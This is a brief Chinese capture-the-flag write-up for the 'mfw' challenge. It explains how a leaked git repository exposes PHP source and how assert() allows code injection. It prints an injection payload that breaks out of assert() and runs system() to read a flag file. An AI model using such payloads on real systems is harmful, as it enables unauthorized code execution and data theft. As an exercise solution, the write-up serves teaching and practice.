攻防世界mfw(PHP assert命令执行注入)

该题目通过扫面后台目录发现存在git泄漏，用GitHack跑完后发现了该题目的源码，漏洞利用在assert函数任意代码执行，如下图。

 

我们传入payload:?page=abc') or system("cat templates/flag.php");//

则变为

assert("file_exists('templates/abc') or system("cat templates/flag.php");//.php')") or die("That file doesn't exist!");

从而实现任意代码执行。

 

总结：

assert函数中可以利用or执行其他命令。